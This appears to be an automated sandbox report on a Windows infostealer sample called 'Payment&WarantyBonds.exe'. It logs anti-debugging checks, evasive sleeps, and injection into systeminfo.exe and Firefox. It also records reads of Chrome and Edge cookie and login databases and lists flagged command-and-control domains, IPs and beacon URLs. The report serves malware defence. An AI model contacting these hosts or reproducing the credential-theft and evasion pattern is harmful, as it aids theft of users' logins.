Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Memory allocated: 7A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Memory allocated: 2630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Memory allocated: BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Memory allocated: 8440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Memory allocated: 9440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Memory allocated: 9630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Memory allocated: A630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Memory allocated: B080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Memory allocated: C080000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\systeminfo.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe TID: 7304	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7920	Thread sleep count: 313 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7920	Thread sleep time: -626000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7920	Thread sleep count: 9660 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7920	Thread sleep time: -19320000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940	Thread sleep time: -57000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940	Thread sleep time: -38000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\systeminfo.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systeminfo.exe	Last function: Thread delayed

Source: lVlYtqLlYCJP.exe, 00000008.00000002.4106292158.0000000000860000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: systeminfo.exe, 00000007.00000002.4105934203.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000009.00000002.2334739815.00000125FE76C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll??

Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtTerminateThread: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: NULL target: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: NULL target: C:\Windows\SysWOW64\systeminfo.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: NULL target: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: NULL target: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: lVlYtqLlYCJP.exe, 00000006.00000000.1945587937.0000000001721000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106494238.0000000001720000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099466223.0000000000E60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: lVlYtqLlYCJP.exe, 00000006.00000000.1945587937.0000000001721000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106494238.0000000001720000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099466223.0000000000E60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: lVlYtqLlYCJP.exe, 00000006.00000000.1945587937.0000000001721000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106494238.0000000001720000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099466223.0000000000E60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: lVlYtqLlYCJP.exe, 00000006.00000000.1945587937.0000000001721000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106494238.0000000001720000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099466223.0000000000E60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.154.67	www.091210.xyz	United States	13335	CLOUDFLARENETUS	true
13.248.169.48	www.xipowerplay.xyz	United States	16509	AMAZON-02US	true
20.2.249.7	www.adsa6c.top	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
144.76.190.39	basicreviews.online	Germany	24940	HETZNER-ASDE	true
199.59.243.227	www.297676.com	United States	395082	BODIS-NJUS	true
217.160.0.60	solarand.online	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
198.251.84.200	stationseek.online	United States	53667	PONYNETUS	true
161.97.142.144	www.030002059.xyz	United States	51167	CONTABODE	true
203.161.49.193	www.simplek.top	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
103.120.80.111	www.cotti.club	Hong Kong	139021	WEST263GO-HKWest263InternationalLimitedHK	true
34.92.128.59	www.sgland06.online	United States	15169	GOOGLEUS	false
3.33.130.190	iampinky.info	United States	8987	AMAZONEXPANSIONGB	true
152.42.255.48	extrime1.shop	United States	81	NCRENUS	true
217.76.156.252	www.cesach.net	Spain	8560	ONEANDONE-ASBrauerstrasse48DE	true

Name	Malicious	Reputation
http://www.cotti.club/3ej6/?78=Gf4n60vPMxeL0A+d5GBWdueSYaV7AAF6sYlT7O2otcMNGwtil4ITBlU9iT/EVO+vtwlhWFB1C/mfTw8URcWhMQgTObTwj1m/ib0JAzzbicsZX3cTLGstzzo=&hrOd=1DzdIBZXhZaHw2Wp	true	unknown
http://www.091210.xyz/jwed/?hrOd=1DzdIBZXhZaHw2Wp&78=BP+RnxL4kRmCbJis2H94uci3abF0xOX/uWRdW7IS0nQn3eBqrLGhokpRAgB0njlljCrnZN3jlOJi4UAaeIXlep/T+OgRPR3ifAipJWCHkORcjZ0KtUFfU2c=	true	unknown
http://www.297676.com/xyex/?78=GRv8gXQeeb2Gl8ts68dy26JEIDOFTPQDU1Y3CPEivIL54q3aRuVfXNser16Tn8T/OBl4IICKxXKXWQiZ2Uzn7HwRtVNzQ2FbKXtno3vR39Y/zqEhWKkV0ww=&hrOd=1DzdIBZXhZaHw2Wp	true	unknown
http://www.extrime1.shop/jr4j/	true	unknown
http://www.xipowerplay.xyz/akxn/	true	unknown
http://www.xipowerplay.xyz/akxn/?hrOd=1DzdIBZXhZaHw2Wp&78=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks=	true	unknown
http://www.030002059.xyz/2sun/?78=HFv57CWzV4D1L9ubGrUw/N+LZZ6BniYLjcS4cRbGENzhA3BKZjtgqnC6wzdpxcsL4M445YXmdmOqKzt/9+uXSXCfKbs+tX0lmfcjUf3N9oWc/wvfMeYS2jQ=&hrOd=1DzdIBZXhZaHw2Wp	true	unknown
http://www.iampinky.info/nhtq/?78=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&hrOd=1DzdIBZXhZaHw2Wp	true	unknown
http://www.cesach.net/dma3/?hrOd=1DzdIBZXhZaHw2Wp&78=IhPPRAmDChEnx8G5Mk3wYKJVvliqClSy7lT3/i9hniKwN2WP3nmtzIAyaYX2MoR3jQRU/NaT7iTCvd3O/fPSuEFMVnQWNGAOAVxjgpJaGw2AUh+P10Czoew=	true	unknown
http://www.sgland06.online/33ib/?hrOd=1DzdIBZXhZaHw2Wp&78=AYOfApeu9cghctp2i/KTSy5LkW4tz9x7+arej5d+r0NkQieZykYOddwLhoh5ni50J8Z5WiAS8Adn1ZwJ2laV/jmSd394ohUQohZCg1IJ+kicD56x/bghldI=	false	unknown
http://www.stationseek.online/wd23/?78=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&hrOd=1DzdIBZXhZaHw2Wp	true	unknown
http://www.091210.xyz/jwed/	true	unknown
http://www.adsa6c.top/wr26/	true	unknown
http://www.simplek.top/ep69/?78=1FIMhSJhU8+lHAAmrS+FlWYlLXz7aIiZYVZCfaZw4D7e7Ym+VFULEmTMy/HAB+T+rsRxHszMTzww+hC5XQWyLoZ+L/5l/vKoQeg/i8EmIWt3MnVCcXzM6O0=&hrOd=1DzdIBZXhZaHw2Wp	true	unknown
http://www.cotti.club/3ej6/	true	unknown
http://www.030002059.xyz/2sun/	true	unknown
http://www.solarand.online/diem/?hrOd=1DzdIBZXhZaHw2Wp&78=6kQoSQEqBTKFeIgPWItcwMtJ6+nSmUORx6o6L7StlLAM0wJa+kMHFj5rDbCqKJO5phAeVuacSteB2VMr/yCaTx+wFCn7HbSrd9uZdvfw4QtNwXqKd1ZsMRg=	true	unknown
http://www.basicreviews.online/3xn5/	true	unknown
http://www.adsa6c.top/wr26/?78=8UnATjvfTpQ77jvixFCgWVUX2yh4jGZbjC17bXoElnpRCxInjgnE/2IqsqXHODoNl6OiDfBQBXM7D7XvNANc8/XGVjRwEyGKTULZaqlRQkXooaUfX5GSz0A=&hrOd=1DzdIBZXhZaHw2Wp	true	unknown
http://www.297676.com/xyex/	true	unknown
http://www.solarand.online/diem/	true	unknown
http://www.sgland06.online/33ib/	false	unknown
http://www.stationseek.online/wd23/	true	unknown
http://www.cesach.net/dma3/	true	unknown
http://www.basicreviews.online/3xn5/?78=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&hrOd=1DzdIBZXhZaHw2Wp	true	unknown
http://www.simplek.top/ep69/	true	unknown

ID:	1545791
Product:	CloudBasic
Start time:	01:36:09
Start date:	31.10.2024
Sample:	Payment&WarantyBonds.bat
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	a9da1b42f6ad80ee6085f69e6c25f49b
SHA1:	e7f51c3eb496a278999fd893e1fcfca8a685f854
SHA256:	4e6fe41b2158546ebc7d5dcfe13aa832e3ce5025b36e0cfcc9d7f373e1a0a089
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Windows Analysis Report Payment&WarantyBonds.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Payment&WarantyBonds.exe

Malware Threat Intel
Provided by

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment&WarantyBonds.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Temp\4648H9mUM	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3